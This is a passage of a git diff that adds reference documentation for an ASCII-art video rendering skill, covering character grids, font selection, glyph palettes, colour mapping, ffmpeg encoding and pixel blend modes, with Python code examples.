+from concurrent.futures import ProcessPoolExecutor, as_completed
+with ProcessPoolExecutor(max_workers=hw["workers"]) as pool:
+    futures = {pool.submit(render_clip, seg, features, path): seg["id"]
+               for seg, path in clip_args}
+    for fut in as_completed(futures):
+        fut.result()
+```
+
+CLI: `--clip q00 t00 q01` to re-render specific clips, `--list` to show segments, `--skip-render` to re-stitch only.
+
+### Step 5: Render and Iterate
+
+Performance targets per frame:
+
+| Component | Budget |
+|-----------|--------|
+| Feature extraction | 1-5ms |
+| Effect function | 2-15ms |
+| Character render | 80-150ms (bottleneck) |
+| Shader pipeline | 5-25ms |
+| **Total** | ~100-200ms/frame |
+
+**Fast iteration**: render single test frames to check brightness/layout before full render:
+```python
+canvas = render_single_frame(frame_index, features, renderer)
+Image.fromarray(canvas).save("test.png")
+```
+
+**Brightness verification**: sample 5-10 frames across video, check `mean > 8` for ASCII content.
+
+## References
+
+| File | Contents |
+|------|----------|
+| `references/architecture.md` | Grid system, font selection, character palettes (library of 20+), color system (HSV + discrete RGB), `_render_vf()` helper, compositing, v2 effect function contract |
+| `references/inputs.md` | All input sources: audio analysis, video sampling, image conversion, text/lyrics, TTS integration (ElevenLabs, voice assignment, audio mixing) |
+| `references/effects.md` | Effect building blocks: 12 value field generators (`vf_sinefield` through `vf_noise_static`), 8 hue field generators (`hf_fixed` through `hf_plasma`), radial/wave/fire effects, particles, composing guide |
+| `references/shaders.md` | 38 shader implementations (geometry, channel, color, glow, noise, pattern, tone, glitch, mirror), `ShaderChain` class, full `_apply_shader_step()` dispatch, audio-reactive scaling, transitions, tint presets |
+| `references/composition.md` | **v2 core**: pixel blend modes (20 modes with implementations), multi-grid composition, `_render_vf()` helper, adaptive `tonemap()`, per-scene gamma, `FeedbackBuffer` with spatial transforms, `PixelBlendStack` |
+| `references/scenes.md` | **v2 scene protocol**: scene function contract, `Renderer` class, `SCENES` table structure, `render_clip()` loop, beat-synced cutting, parallel rendering + pickling constraints, 4 complete scene examples, scene design checklist |
+| `references/troubleshooting.md` | NumPy broadcasting traps, blend mode pitfalls, multiprocessing/pickling issues, brightness diagnostics, ffmpeg deadlocks, font issues, performance bottlenecks, common mistakes |
+| `references/optimization.md` | Hardware detection, adaptive quality profiles (draft/preview/production/max), CLI integration, vectorized effect patterns, parallel rendering, memory management |
diff --git a/skills/creative/ascii-video/references/architecture.md b/skills/creative/ascii-video/references/architecture.md
new file mode 100644
index 00000000..a255523a
--- /dev/null
+++ b/skills/creative/ascii-video/references/architecture.md
@@ -0,0 +1,528 @@
+# Architecture Reference
+
+## Grid System
+
+### Multi-Density Grids
+
+Pre-initialize multiple grid sizes. Switch per section for visual variety.
+
+| Key | Font Size | Grid (1920x1080) | Use |
+|-----|-----------|-------------------|-----|
+| xs | 8 | 400x108 | Ultra-dense data fields |
+| sm | 10 | 320x83 | Dense detail, rain, starfields |
+| md | 16 | 192x56 | Default balanced, transitions |
+| lg | 20 | 160x45 | Quote/lyric text (readable at 1080p) |
+| xl | 24 | 137x37 | Short quotes, large titles |
+| xxl | 40 | 80x22 | Giant text, minimal |
+
+**Grid sizing for text-heavy content**: When displaying readable text (quotes, lyrics, testimonials), use 20px (`lg`) as the primary grid. This gives 160 columns -- plenty for lines up to ~50 chars centered. For very short quotes (< 60 chars, <= 3 lines), 24px (`xl`) makes them more impactful. Only init the grids you actually use -- each grid pre-rasterizes all characters which costs ~0.3-0.5s.
+
+Grid dimensions: `cols = VW // cell_width`, `rows = VH // cell_height`.
+
+### Font Selection
+
+Don't hardcode a single font. Choose fonts to match the project's mood. Monospace fonts are required for grid alignment but vary widely in personality:
+
+| Font | Personality | Platform |
+|------|-------------|----------|
+| Menlo | Clean, neutral, Apple-native | macOS |
+| Monaco | Retro terminal, compact | macOS |
+| Courier New | Classic typewriter, wide | Cross-platform |
+| SF Mono | Modern, tight spacing | macOS |
+| Consolas | Windows native, clean | Windows |
+| JetBrains Mono | Developer, ligature-ready | Install |
+| Fira Code | Geometric, modern | Install |
+| IBM Plex Mono | Corporate, authoritative | Install |
+| Source Code Pro | Adobe, balanced | Install |
+
+**Font detection at init**: probe available fonts and fall back gracefully:
+
+```python
+import platform
+
+def find_font(preferences):
+    """Try fonts in order, return first that exists."""
+    for name, path in preferences:
+        if os.path.exists(path):
+            return path
+    raise FileNotFoundError(f"No monospace font found. Tried: {[p for _,p in preferences]}")
+
+FONT_PREFS_MACOS = [
+    ("Menlo", "/System/Library/Fonts/Menlo.ttc"),
+    ("Monaco", "/System/Library/Fonts/Monaco.ttf"),
+    ("SF Mono", "/System/Library/Fonts/SFNSMono.ttf"),
+    ("Courier", "/System/Library/Fonts/Courier.ttc"),
+]
+FONT_PREFS_LINUX = [
+    ("DejaVu Sans Mono", "/usr/share/fonts/truetype/dejavu/DejaVuSansMono.ttf"),
+    ("Liberation Mono", "/usr/share/fonts/truetype/liberation/LiberationMono-Regular.ttf"),
+    ("Noto Sans Mono", "/usr/share/fonts/truetype/noto/NotoSansMono-Regular.ttf"),
+    ("Ubuntu Mono", "/usr/share/fonts/truetype/ubuntu/UbuntuMono-R.ttf"),
+]
+FONT_PREFS = FONT_PREFS_MACOS if platform.system() == "Darwin" else FONT_PREFS_LINUX
+```
+
+**Multi-font rendering**: use different fonts for different layers (e.g., monospace for background, a bolder variant for overlay text). Each GridLayer owns its own font:
+
+```python
+grid_bg = GridLayer(find_font(FONT_PREFS), 16)       # background
+grid_text = GridLayer(find_font(BOLD_PREFS), 20)      # readable text
+```
+
+### Collecting All Characters
+
+Before initializing grids, gather all characters that need bitmap pre-rasterization:
+
+```python
+all_chars = set()
+for pal in [PAL_DEFAULT, PAL_DENSE, PAL_BLOCKS, PAL_RUNE, PAL_KATA,
+            PAL_GREEK, PAL_MATH, PAL_DOTS, PAL_BRAILLE, PAL_STARS,
+            PAL_BINARY, PAL_MUSIC, PAL_BOX, PAL_CIRCUIT, PAL_ARROWS,
+            PAL_HERMES]:  # ... all palettes used in project
+    all_chars.update(pal)
+# Add any overlay text characters
+all_chars.update("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 .,-:;!?/|")
+all_chars.discard(" ")  # space is never rendered
+```
+
+### GridLayer Initialization
+
+Each grid pre-computes coordinate arrays for vectorized effect math:
+
+```python
+class GridLayer:
+    def __init__(self, font_path, font_size):
+        self.font = ImageFont.truetype(font_path, font_size)
+        asc, desc = self.font.getmetrics()
+        bbox = self.font.getbbox("M")
+        self.cw = bbox[2] - bbox[0]  # character cell width
+        self.ch = asc + desc  # CRITICAL: not textbbox height
+
+        self.cols = VW // self.cw
+        self.rows = VH // self.ch
+        self.ox = (VW - self.cols * self.cw) // 2  # centering
+        self.oy = (VH - self.rows * self.ch) // 2
+
+        # Index arrays
+        self.rr = np.arange(self.rows, dtype=np.float32)[:, None]
+        self.cc = np.arange(self.cols, dtype=np.float32)[None, :]
+
+        # Polar coordinates (aspect-corrected)
+        cx, cy = self.cols / 2.0, self.rows / 2.0
+        asp = self.cw / self.ch
+        self.dx = self.cc - cx
+        self.dy = (self.rr - cy) * asp
+        self.dist = np.sqrt(self.dx**2 + self.dy**2)
+        self.angle = np.arctan2(self.dy, self.dx)
+
+        # Normalized (0-1 range) -- for distance falloff
+        self.dx_n = (self.cc - cx) / max(self.cols, 1)
+        self.dy_n = (self.rr - cy) / max(self.rows, 1) * asp
+        self.dist_n = np.sqrt(self.dx_n**2 + self.dy_n**2)
+
+        # Pre-rasterize all characters to float32 bitmaps
+        self.bm = {}
+        for c in all_chars:
+            img = Image.new("L", (self.cw, self.ch), 0)
+            ImageDraw.Draw(img).text((0, 0), c, fill=255, font=self.font)
+            self.bm[c] = np.array(img, dtype=np.float32) / 255.0
+```
+
+### Character Render Loop
+
+The bottleneck. Composites pre-rasterized bitmaps onto pixel canvas:
+
+```python
+def render(self, chars, colors, canvas=None):
+    if canvas is None:
+        canvas = np.zeros((VH, VW, 3), dtype=np.uint8)
+    for row in range(self.rows):
+        y = self.oy + row * self.ch
+        if y + self.ch > VH: break
+        for col in range(self.cols):
+            c = chars[row, col]
+            if c == " ": continue
+            x = self.ox + col * self.cw
+            if x + self.cw > VW: break
+            a = self.bm[c]  # float32 bitmap
+            canvas[y:y+self.ch, x:x+self.cw] = np.maximum(
+                canvas[y:y+self.ch, x:x+self.cw],
+                (a[:, :, None] * colors[row, col]).astype(np.uint8))
+    return canvas
+```
+
+Use `np.maximum` for additive blending (brighter chars overwrite dimmer ones, never darken).
+
+### Multi-Layer Rendering
+
+Render multiple grids onto the same canvas for depth:
+
+```python
+canvas = np.zeros((VH, VW, 3), dtype=np.uint8)
+canvas = grid_lg.render(bg_chars, bg_colors, canvas)   # background layer
+canvas = grid_md.render(main_chars, main_colors, canvas)  # main layer
+canvas = grid_sm.render(detail_chars, detail_colors, canvas)  # detail overlay
+```
+
+---
+
+## Character Palettes
+
+### Design Principles
+
+Character palettes are the primary visual texture of ASCII video. They control not just brightness mapping but the entire visual feel. Design palettes intentionally:
+
+- **Visual weight**: characters sorted by the amount of ink/pixels they fill. Space is always index 0.
+- **Coherence**: characters within a palette should belong to the same visual family.
+- **Density curve**: the brightness-to-character mapping is nonlinear. Dense palettes (many chars) give smoother gradients; sparse palettes (5-8 chars) give posterized/graphic looks.
+- **Rendering compatibility**: every character in the palette must exist in the font. Test at init and remove missing glyphs.
+
+### Palette Library
+
+Organized by visual family. Mix and match per project -- don't default to PAL_DEFAULT for everything.
+
+#### Density / Brightness Palettes
+```python
+PAL_DEFAULT  = " .`'-:;!><=+*^~?/|(){}[]#&$@%"       # classic ASCII art
+PAL_DENSE    = " .:;+=xX$#@\u2588"                          # simple 11-level ramp
+PAL_MINIMAL  = " .:-=+#@"                               # 8-level, graphic
+PAL_BINARY   = " \u2588"                                      # 2-level, extreme contrast
+PAL_GRADIENT = " \u2591\u2592\u2593\u2588"                              # 4-level block gradient
+```
+
+#### Unicode Block Elements
+```python
+PAL_BLOCKS   = " \u2591\u2592\u2593\u2588\u2584\u2580\u2590\u258c"                 # standard blocks
+PAL_BLOCKS_EXT = " \u2596\u2597\u2598\u2599\u259a\u259b\u259c\u259d\u259e\u259f\u2591\u2592\u2593\u2588"  # quadrant blocks (more detail)
+PAL_SHADE    = " \u2591\u2592\u2593\u2588\u2587\u2586\u2585\u2584\u2583\u2582\u2581"          # vertical fill progression
+```
+
+#### Symbolic / Thematic
+```python
+PAL_MATH     = " \u00b7\u2218\u2219\u2022\u00b0\u00b1\u2213\u00d7\u00f7\u2248\u2260\u2261\u2264\u2265\u221e\u222b\u2211\u220f\u221a\u2207\u2202\u2206\u03a9"    # math symbols
+PAL_BOX      = " \u2500\u2502\u250c\u2510\u2514\u2518\u251c\u2524\u252c\u2534\u253c\u2550\u2551\u2554\u2557\u255a\u255d\u2560\u2563\u2566\u2569\u256c"          # box drawing
+PAL_CIRCUIT  = " .\u00b7\u2500\u2502\u250c\u2510\u2514\u2518\u253c\u25cb\u25cf\u25a1\u25a0\u2206\u2207\u2261"                 # circuit board
+PAL_RUNE     = " .\u16a0\u16a2\u16a6\u16b1\u16b7\u16c1\u16c7\u16d2\u16d6\u16da\u16de\u16df"                   # elder futhark runes
+PAL_ALCHEMIC = " \u2609\u263d\u2640\u2642\u2643\u2644\u2645\u2646\u2647\u2648\u2649\u264a\u264b"            # planetary/alchemical symbols
+PAL_ZODIAC   = " \u2648\u2649\u264a\u264b\u264c\u264d\u264e\u264f\u2650\u2651\u2652\u2653"            # zodiac
+PAL_ARROWS   = " \u2190\u2191\u2192\u2193\u2194\u2195\u2196\u2197\u2198\u2199\u21a9\u21aa\u21bb\u27a1"             # directional arrows
+PAL_MUSIC    = " \u266a\u266b\u266c\u2669\u266d\u266e\u266f\u25cb\u25cf"                       # musical notation
+```
+
+#### Script / Writing System
+```python
+PAL_KATA     = " \u00b7\uff66\uff67\uff68\uff69\uff6a\uff6b\uff6c\uff6d\uff6e\uff6f\uff70\uff71\uff72\uff73\uff74\uff75\uff76\uff77"          # katakana halfwidth (matrix rain)
+PAL_GREEK    = " \u03b1\u03b2\u03b3\u03b4\u03b5\u03b6\u03b7\u03b8\u03b9\u03ba\u03bb\u03bc\u03bd\u03be\u03c0\u03c1\u03c3\u03c4\u03c6\u03c8\u03c9"    # Greek lowercase
+PAL_CYRILLIC = " \u0430\u0431\u0432\u0433\u0434\u0435\u0436\u0437\u0438\u043a\u043b\u043c\u043d\u043e\u043f\u0440\u0441\u0442\u0443\u0444\u0445\u0446\u0447\u0448"  # Cyrillic lowercase
+PAL_ARABIC   = " \u0627\u0628\u062a\u062b\u062c\u062d\u062e\u062f\u0630\u0631\u0632\u0633\u0634\u0635\u0636\u0637"       # Arabic letters (isolated forms)
+```
+
+#### Dot / Point Progressions
+```python
+PAL_DOTS     = " \u22c5\u2218\u2219\u25cf\u25c9\u25ce\u25c6\u2726\u2605"                   # dot size progression
+PAL_BRAILLE  = " \u2801\u2802\u2803\u2804\u2805\u2806\u2807\u2808\u2809\u280a\u280b\u280c\u280d\u280e\u280f\u2810\u2811\u2812\u2813\u2814\u2815\u2816\u2817\u2818\u2819\u281a\u281b\u281c\u281d\u281e\u281f\u283f"  # braille patterns
+PAL_STARS    = " \u00b7\u2727\u2726\u2729\u2728\u2605\u2736\u2733\u2738"               # star progression
+```
+
+#### Project-Specific (examples -- invent new ones per project)
+```python
+PAL_HERMES   = " .\u00b7~=\u2248\u221e\u26a1\u263f\u2726\u2605\u2295\u25ca\u25c6\u25b2\u25bc\u25cf\u25a0"   # mythology/tech blend
+PAL_OCEAN    = " ~\u2248\u2248\u2248\u223c\u2307\u2248\u224b\u224c\u2248"                       # water/wave characters
+PAL_ORGANIC  = " .\u00b0\u2218\u2022\u25e6\u25c9\u2742\u273f\u2741\u2743"                 # growing/botanical
+PAL_MACHINE  = " _\u2500\u2502\u250c\u2510\u253c\u2261\u25a0\u2588\u2593\u2592\u2591"             # mechanical/industrial
+```
+
+### Creating Custom Palettes
+
+When designing for a project, build palettes from the content's theme:
+
+1. **Choose a visual family** (dots, blocks, symbols, script)
+2. **Sort by visual weight** -- render each char at target font size, count lit pixels, sort ascending
+3. **Test at target grid size** -- some chars collapse to blobs at small sizes
+4. **Validate in font** -- remove chars the font can't render:
+
+```python
+def validate_palette(pal, font):
+    """Remove characters the font can't render."""
+    valid = []
+    for c in pal:
+        if c == " ":
+            valid.append(c)
+            continue
+        img = Image.new("L", (20, 20), 0)
+        ImageDraw.Draw(img).text((0, 0), c, fill=255, font=font)
+        if np.array(img).max() > 0:  # char actually rendered something
+            valid.append(c)
+    return "".join(valid)
+```
+
+### Mapping Values to Characters
+
+```python
+def val2char(v, mask, pal=PAL_DEFAULT):
+    """Map float array (0-1) to character array using palette."""
+    n = len(pal)
+    idx = np.clip((v * n).astype(int), 0, n - 1)
+    out = np.full(v.shape, " ", dtype="U1")
+    for i, ch in enumerate(pal):
+        out[mask & (idx == i)] = ch
+    return out
+```
+
+**Nonlinear mapping** for different visual curves:
+
+```python
+def val2char_gamma(v, mask, pal, gamma=1.0):
+    """Gamma-corrected palette mapping. gamma<1 = brighter, gamma>1 = darker."""
+    v_adj = np.power(np.clip(v, 0, 1), gamma)
+    return val2char(v_adj, mask, pal)
+
+def val2char_step(v, mask, pal, thresholds):
+    """Custom threshold mapping. thresholds = list of float breakpoints."""
+    out = np.full(v.shape, pal[0], dtype="U1")
+    for i, thr in enumerate(thresholds):
+        out[mask & (v > thr)] = pal[min(i + 1, len(pal) - 1)]
+    return out
+```
+
+---
+
+## Color System
+
+### HSV->RGB (Vectorized)
+
+All color computation in HSV for intuitive control, converted at render time:
+
+```python
+def hsv2rgb(h, s, v):
+    """Vectorized HSV->RGB. h,s,v are numpy arrays. Returns (R,G,B) uint8 arrays."""
+    h = h % 1.0
+    c = v * s; x = c * (1 - np.abs((h*6) % 2 - 1)); m = v - c
+    # ... 6 sector assignment ...
+    return (np.clip((r+m)*255, 0, 255).astype(np.uint8),
+            np.clip((g+m)*255, 0, 255).astype(np.uint8),
+            np.clip((b+m)*255, 0, 255).astype(np.uint8))
+```
+
+### Color Mapping Strategies
+
+Don't default to a single strategy. Choose based on the visual intent:
+
+| Strategy | Hue source | Effect | Good for |
+|----------|------------|--------|----------|
+| Angle-mapped | `g.angle / (2*pi)` | Rainbow around center | Radial effects, kaleidoscopes |
+| Distance-mapped | `g.dist_n * 0.3` | Gradient from center | Tunnels, depth effects |
+| Frequency-mapped | `f["cent"] * 0.2` | Timbral color shifting | Audio-reactive |
+| Value-mapped | `val * 0.15` | Brightness-dependent hue | Fire, heat maps |
+| Time-cycled | `t * rate` | Slow color rotation | Ambient, chill |
+| Source-sampled | Video frame pixel colors | Preserve original color | Video-to-ASCII |
+| Palette-indexed | Discrete color lookup | Flat graphic style | Retro, pixel art |
+| Temperature | Blend between warm/cool | Emotional tone | Mood-driven scenes |
+| Complementary | `hue` and `hue + 0.5` | High contrast | Bold, dramatic |
+| Triadic | `hue`, `hue + 0.33`, `hue + 0.66` | Vibrant, balanced | Psychedelic |
+| Analogous | `hue +/- 0.08` | Harmonious, subtle | Elegant, cohesive |
+| Monochrome | Fixed hue, vary S and V | Restrained, focused | Noir, minimal |
+
+### Color Palettes (Discrete RGB)
+
+For non-HSV workflows -- direct RGB color sets for graphic/retro looks:
+
+```python
+# Named color palettes -- use for flat/graphic styles or per-character coloring
+COLORS_NEON = [(255,0,102), (0,255,153), (102,0,255), (255,255,0), (0,204,255)]
+COLORS_PASTEL = [(255,179,186), (255,223,186), (255,255,186), (186,255,201), (186,225,255)]
+COLORS_MONO_GREEN = [(0,40,0), (0,80,0), (0,140,0), (0,200,0), (0,255,0)]
+COLORS_MONO_AMBER = [(40,20,0), (80,50,0), (140,90,0), (200,140,0), (255,191,0)]
+COLORS_CYBERPUNK = [(255,0,60), (0,255,200), (180,0,255), (255,200,0)]
+COLORS_VAPORWAVE = [(255,113,206), (1,205,254), (185,103,255), (5,255,161)]
+COLORS_EARTH = [(86,58,26), (139,90,43), (189,154,91), (222,193,136), (245,230,193)]
+COLORS_ICE = [(200,230,255), (150,200,240), (100,170,230), (60,130,210), (30,80,180)]
+COLORS_BLOOD = [(80,0,0), (140,10,10), (200,20,20), (255,50,30), (255,100,80)]
+COLORS_FOREST = [(10,30,10), (20,60,15), (30,100,20), (50,150,30), (80,200,50)]
+
+def rgb_palette_map(val, mask, palette):
+    """Map float array (0-1) to RGB colors from a discrete palette."""
+    n = len(palette)
+    idx = np.clip((val * n).astype(int), 0, n - 1)
+    R = np.zeros(val.shape, dtype=np.uint8)
+    G = np.zeros(val.shape, dtype=np.uint8)
+    B = np.zeros(val.shape, dtype=np.uint8)
+    for i, (r, g, b) in enumerate(palette):
+        m = mask & (idx == i)
+        R[m] = r; G[m] = g; B[m] = b
+    return R, G, B
+```
+
+### Compositing Helpers
+
+```python
+def mkc(R, G, B, rows, cols):
+    """Pack 3 uint8 arrays into (rows, cols, 3) color array."""
+    o = np.zeros((rows, cols, 3), dtype=np.uint8)
+    o[:,:,0] = R; o[:,:,1] = G; o[:,:,2] = B
+    return o
+
+def layer_over(base_ch, base_co, top_ch, top_co):
+    """Composite top layer onto base. Non-space chars overwrite."""
+    m = top_ch != " "
+    base_ch[m] = top_ch[m]; base_co[m] = top_co[m]
+    return base_ch, base_co
+
+def layer_blend(base_co, top_co, alpha):
+    """Alpha-blend top color layer onto base. alpha is float array (0-1) or scalar."""
+    if isinstance(alpha, (int, float)):
+        alpha = np.full(base_co.shape[:2], alpha, dtype=np.float32)
+    a = alpha[:,:,None]
+    return np.clip(base_co * (1 - a) + top_co * a, 0, 255).astype(np.uint8)
+
+def stamp(ch, co, text, row, col, color=(255,255,255)):
+    """Write text string at position."""
+    for i, c in enumerate(text):
+        cc = col + i
+        if 0 <= row < ch.shape[0] and 0 <= cc < ch.shape[1]:
+            ch[row, cc] = c; co[row, cc] = color
+```
+
+---
+
+## Section System
+
+Map time ranges to effect functions + shader configs + grid sizes:
+
+```python
+SECTIONS = [
+    (0.0, "void"), (3.94, "starfield"), (21.0, "matrix"),
+    (46.0, "drop"), (130.0, "glitch"), (187.0, "outro"),
+]
+
+FX_DISPATCH = {"void": fx_void, "starfield": fx_starfield, ...}
+SECTION_FX = {"void": {"vignette": 0.3, "bloom": 170}, ...}
+SECTION_GRID = {"void": "md", "starfield": "sm", "drop": "lg", ...}
+SECTION_MIRROR = {"drop": "h", "bass_rings": "quad"}
+
+def get_section(t):
+    sec = SECTIONS[0][1]
+    for ts, name in SECTIONS:
+        if t >= ts: sec = name
+    return sec
+```
+
+---
+
+## Parallel Encoding
+
+Split frames across N workers. Each pipes raw RGB to its own ffmpeg subprocess:
+
+```python
+def render_batch(batch_id, frame_start, frame_end, features, seg_path):
+    r = Renderer()
+    cmd = ["ffmpeg", "-y", "-f", "rawvideo", "-pix_fmt", "rgb24",
+           "-s", f"{VW}x{VH}", "-r", str(FPS), "-i", "pipe:0",
+           "-c:v", "libx264", "-preset", "fast", "-crf", "18",
+           "-pix_fmt", "yuv420p", seg_path]
+
+    # CRITICAL: stderr to file, not pipe
+    stderr_fh = open(os.path.join(workdir, f"err_{batch_id:02d}.log"), "w")
+    pipe = subprocess.Popen(cmd, stdin=subprocess.PIPE,
+                            stdout=subprocess.DEVNULL, stderr=stderr_fh)
+
+    for fi in range(frame_start, frame_end):
+        t = fi / FPS
+        sec = get_section(t)
+        f = {k: float(features[k][fi]) for k in features}
+        ch, co = FX_DISPATCH[sec](r, f, t)
+        canvas = r.render(ch, co)
+        canvas = apply_mirror(canvas, sec, f)
+        canvas = apply_shaders(canvas, sec, f, t)
+        pipe.stdin.write(canvas.tobytes())
+
+    pipe.stdin.close()
+    pipe.wait()
+    stderr_fh.close()
+```
+
+Concatenate segments + mux audio:
+
+```python
+# Write concat file
+with open(concat_path, "w") as cf:
+    for seg in segments:
+        cf.write(f"file '{seg}'\n")
+
+subprocess.run(["ffmpeg", "-y", "-f", "concat", "-safe", "0", "-i", concat_path,
+                "-i", audio_path, "-c:v", "copy", "-c:a", "aac", "-b:a", "192k",
+                "-shortest", output_path])
+```
+
+## Effect Function Contract
+
+### v2 Protocol (Current)
+
+Every scene function: `(renderer, features_dict, time_float, state_dict) -> canvas_uint8`
+
+```python
+def fx_example(r, f, t, S):
+    """Scene function returns a full pixel canvas (uint8 H,W,3).
+    Scenes have full control over multi-grid rendering and pixel-level composition.
+    """
+    # Render multiple layers at different grid densities
+    canvas_a = _render_vf(r, "md", vf_plasma, hf_angle(0.0), PAL_DENSE, f, t, S)
+    canvas_b = _render_vf(r, "sm", vf_vortex, hf_time_cycle(0.1), PAL_RUNE, f, t, S)
+
+    # Pixel-level blend
+    result = blend_canvas(canvas_a, canvas_b, "screen", 0.8)
+    return result
+```
+
+See `references/scenes.md` for the full scene protocol, the Renderer class, `_render_vf()` helper, and complete scene examples.
+
+See `references/composition.md` for blend modes, tone mapping, feedback buffers, and multi-grid composition.
+
+### v1 Protocol (Legacy)
+
+Simple scenes that use a single grid can still return `(chars, colors)` and let the caller handle rendering, but the v2 canvas protocol is preferred for all new code.
+
+```python
+def fx_simple(r, f, t, S):
+    g = r.get_grid("md")
+    val = np.sin(g.dist * 0.1 - t * 3) * f.get("bass", 0.3) * 2
+    val = np.clip(val, 0, 1); mask = val > 0.03
+    ch = val2char(val, mask, PAL_DEFAULT)
+    R, G, B = hsv2rgb(np.full_like(val, 0.6), np.full_like(val, 0.7), val)
+    co = mkc(R, G, B, g.rows, g.cols)
+    return g.render(ch, co)  # returns canvas directly
+```
+
+### Persistent State
+
+Effects that need state across frames (particles, rain columns) use the `S` dict parameter (which is `r.S` — same object, but passed explicitly for clarity):
+
+```python
+def fx_with_state(r, f, t, S):
+    if "particles" not in S:
+        S["particles"] = initialize_particles()
+    update_particles(S["particles"])
+    # ...
+```
+
+State persists across frames within a single scene/clip. Each worker process (and each scene) gets its own independent state.
+
+### Helper Functions
+
+```python
+def hsv2rgb_scalar(h, s, v):
+    """Single-value HSV to RGB. Returns (R, G, B) tuple of ints 0-255."""
+    h = h % 1.0
+    c = v * s; x = c * (1 - abs((h * 6) % 2 - 1)); m = v - c
+    if h * 6 < 1:   r, g, b = c, x, 0
+    elif h * 6 < 2:  r, g, b = x, c, 0
+    elif h * 6 < 3:  r, g, b = 0, c, x
+    elif h * 6 < 4:  r, g, b = 0, x, c
+    elif h * 6 < 5:  r, g, b = x, 0, c
+    else:             r, g, b = c, 0, x
+    return (int((r+m)*255), int((g+m)*255), int((b+m)*255))
+
+def log(msg):
+    """Print timestamped log message."""
+    print(msg, flush=True)
+```
diff --git a/skills/creative/ascii-video/references/composition.md b/skills/creative/ascii-video/references/composition.md
new file mode 100644
index 00000000..17e3088f
--- /dev/null
+++ b/skills/creative/ascii-video/references/composition.md
@@ -0,0 +1,476 @@
+# Composition & Brightness Reference
+
+The composable system is the core of visual complexity. It operates at three levels: pixel-level blend modes, multi-grid composition, and adaptive brightness management. This document covers all three.
+
+## Pixel-Level Blend Modes
+
+### The `blend_canvas()` Function
+
+All blending operates on full pixel canvases (`uint8 H,W,3`). Internally converts to float32 [0,1] for precision, blends, lerps by opacity, converts back.
+
+```python
+def blend_canvas(base, top, mode="normal", opacity=1.0):
+    af = base.astype(np.float32) / 255.0
+    bf = top.astype(np.float32) / 255.0
+    fn = BLEND_MODES.get(mode, BLEND_MODES["normal"])
+    result = fn(af, bf)
+    if opacity < 1.0:
+        result = af * (1 - opacity) + result * opacity
+    return np.clip(result * 255, 0, 255).astype(np.uint8)
+```
+
+### 20 Blend Modes
+
+```python
+BLEND_MODES = {
+    # Basic arithmetic
+    "normal":       lambda a, b: b,
+    "add":          lambda a, b: np.clip(a + b, 0, 1),
+    "subtract":     lambda a, b: np.clip(a - b, 0, 1),
+    "multiply":     lambda a, b: a * b,
+    "screen":       lambda a, b: 1 - (1 - a) * (1 - b),
+
+    # Contrast
+    "overlay":      lambda a, b: np.where(a < 0.5, 2*a*b, 1 - 2*(1-a)*(1-b)),
+    "softlight":    lambda a, b: (1 - 2*b)*a*a + 2*b*a,
+    "hardlight":    lambda a, b: np.where(b < 0.5, 2*a*b, 1 - 2*(1-a)*(1-b)),
+
+    # Difference
+    "difference":   lambda a, b: np.abs(a - b),
+    "exclusion":    lambda a, b: a + b - 2*a*b,
+
+    # Dodge / burn
+    "colordodge":   lambda a, b: np.clip(a / (1 - b + 1e-6), 0, 1),
+    "colorburn":    lambda a, b: np.clip(1 - (1 - a) / (b + 1e-6), 0, 1),
+
+    # Light
+    "linearlight":  lambda a, b: np.clip(a + 2*b - 1, 0, 1),
+    "vividlight":   lambda a, b: np.where(b < 0.5,
+                        np.clip(1 - (1-a)/(2*b + 1e-6), 0, 1),
+                        np.clip(a / (2*(1-b) + 1e-6), 0, 1)),
+    "pin_light":    lambda a, b: np.where(b < 0.5,
+                        np.minimum(a, 2*b), np.maximum(a, 2*b - 1)),
+    "hard_mix":     lambda a, b: np.where(a + b >= 1.0, 1.0, 0.0),
+
+    # Compare
+    "lighten":      lambda a, b: np.maximum(a, b),
+    "darken":       lambda a, b: np.minimum(a, b),
+
+    # Grain
+    "grain_extract": lambda a, b: np.clip(a - b + 0.5, 0, 1),
+    "grain_merge":  lambda a, b: np.clip(a + b - 0.5, 0, 1),
+}
+```
+
+### Blend Mode Selection Guide
+
+**Modes that brighten** (safe for dark inputs):
+- `screen` — always brightens. Two 50% gray layers screen to 75%. The go-to safe blend.
+- `add` — simple addition, clips at white. Good for sparkles, glows, particle overlays.
+- `colordodge` — extreme brightening at overlap zones. Can blow out. Use low opacity (0.3-0.5).
+- `linearlight` — aggressive brightening. Similar to add but with offset.
+
+**Modes that darken** (avoid with dark inputs):
+- `multiply` — darkens everything. Only use when both layers are already bright.
+- `overlay` — darkens when base < 0.5, brightens when base > 0.5. Crushes dark inputs: `2 * 0.12 * 0.12 = 0.03`. Use `screen` instead for dark material.
+- `colorburn` — extreme darkening at overlap zones.
+
+**Modes that create contrast**:
+- `softlight` — gentle contrast. Good for subtle texture overlay.
+- `hardlight` — strong contrast. Like overlay but keyed on the top layer.
+- `vividlight` — very aggressive contrast. Use sparingly.
+
+**Modes that create color effects**:
+- `difference` — XOR-like patterns. Two identical layers difference to black; offset layers create wild colors. Great for psychedelic looks.
+- `exclusion` — softer version of difference. Creates complementary color patterns.
+- `hard_mix` — posterizes to pure black/white/saturated color at intersections.
+
+**Modes for texture blending**:
+- `grain_extract` / `grain_merge` — extract a texture from one layer, apply it to another.
+
+### Multi-Layer Chaining
+
+```python
+# Pattern: render layers -> blend sequentially
+canvas_a = _render_vf(r, "md", vf_plasma, hf_angle(0.0), PAL_DENSE, f, t, S)
+canvas_b = _render_vf(r, "sm", vf_vortex, hf_time_cycle(0.1), PAL_RUNE, f, t, S)
+canvas_c = _render_vf(r, "lg", vf_rings, hf_distance(), PAL_BLOCKS, f, t, S)
+
+result = blend_canvas(canvas_a, canvas_b, "screen", 0.8)
+result = blend_canvas(result, canvas_c, "difference", 0.6)
+```
+
+Order matters: `screen(A, B)` is commutative, but `difference(screen(A,B), C)` differs from `difference(A, screen(B,C))`.
+
+---
+
+## Multi-Grid Composition
+
+This is the core visual technique. Rendering the same conceptual scene at different grid densities (character sizes) creates natural texture interference, because characters at different scales overlap at different spatial frequencies.
+
+### Why It Works
+
+- `sm` grid (10pt font): 320x83 characters. Fine detail, dense texture.
+- `md` grid (16pt): 192x56 characters. Medium density.
+- `lg` grid (20pt): 160x45 characters. Coarse, chunky characters.
+
+When you render a plasma field on `sm` and a vortex on `lg`, then screen-blend them, the fine plasma texture shows through the gaps in the coarse vortex characters. The result has more visual complexity than either layer alone.
+
+### The `_render_vf()` Helper
+
